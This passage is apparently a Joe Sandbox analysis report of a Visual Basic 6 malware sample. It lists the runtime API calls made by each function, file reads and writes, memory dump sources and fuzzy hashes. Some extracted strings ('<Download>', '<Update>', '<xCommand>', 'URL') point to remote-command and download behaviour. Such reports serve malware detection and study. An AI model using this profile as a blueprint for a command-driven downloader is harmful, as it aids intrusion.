                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 0041583C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415847
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0041584A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000), ref: 00415865
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041588E
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415855
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,6CEBD9F5,-00000001,6CEBD8B1), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415907
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041590C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415915
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00415932
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415941
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041594D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00415962
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041596D
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159A3
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159B4
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
                                                                                                                                                            • #525.MSVBVM60(?), ref: 004159E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004159F4
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159F9
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415A0A
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
                                                                                                                                                            • #594.MSVBVM60(0000000A), ref: 00415A37
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415A40
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415A86
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
                                                                                                                                                            • __vbaFpUI1.MSVBVM60 ref: 00415ADF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415AF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415B1F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415B6D
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415BB3
                                                                                                                                                            • __vbaFpI4.MSVBVM60 ref: 00415BD5
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415BE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415BF4
                                                                                                                                                            • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C17
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C42
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C55
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C63
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C70
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C73
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00415C7C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CF5
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415D04
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00415D28
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                            • String ID: 0000
                                                                                                                                                            • API String ID: 292954213-211534962
                                                                                                                                                            • Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                                                                            • Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59
                                                                                                                                                            Function 00411D10 Relevance: 143.9, APIs: 81, Strings: 1, Instructions: 403COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(6CFA6537,00000000,00000000), ref: 004156CA
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                              • Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                              • Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                              • Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                              • Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                              • Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                              • Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
                                                                                                                                                            • #580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
                                                                                                                                                            • #598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,00000000,?,00000020), ref: 00411EDE
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,00000000,?,00000000,004025E6), ref: 00411F2C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411F72
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411F81
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004123A0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                            • String ID: 5
                                                                                                                                                            • API String ID: 3012955283-2226203566
                                                                                                                                                            • Opcode ID: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                            • Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
                                                                                                                                                            • Opcode Fuzzy Hash: 4c51faa2736fb7085ee1db596ec4db0ff330f662fb4349c4903174346d8d8e19
                                                                                                                                                            • Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58
                                                                                                                                                            Function 0040F1D0 Relevance: 133.5, APIs: 66, Strings: 10, Instructions: 460COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                              • Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                              • Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                              • Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
                                                                                                                                                            • #712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
                                                                                                                                                            • #712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
                                                                                                                                                            • #712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F345
                                                                                                                                                            • #712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F371
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
                                                                                                                                                            • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                                                                            • API String ID: 3601514899-954089795
                                                                                                                                                            • Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                                                                            • Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                                                                            Function 004111A0 Relevance: 103.8, APIs: 69, Instructions: 297COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411206
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0041120A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411222
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411231
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411243
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411252
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411255
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0041128E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411299
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112A1
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004112AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411471
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041147A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041147E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00411495
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004112DE
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004112C4
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411323
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411326
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411339
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411355
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411364
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411370
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00411385
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411390
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411398
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 0041139B
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113D2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004113E3
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
                                                                                                                                                            • #598.MSVBVM60 ref: 00411404
                                                                                                                                                            • #525.MSVBVM60(-00000001), ref: 00411424
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041142F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411437
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411448
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
                                                                                                                                                            • #598.MSVBVM60 ref: 0041145E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114A9
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,6CEBD9F5,-00000001,6CEBD8B1), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
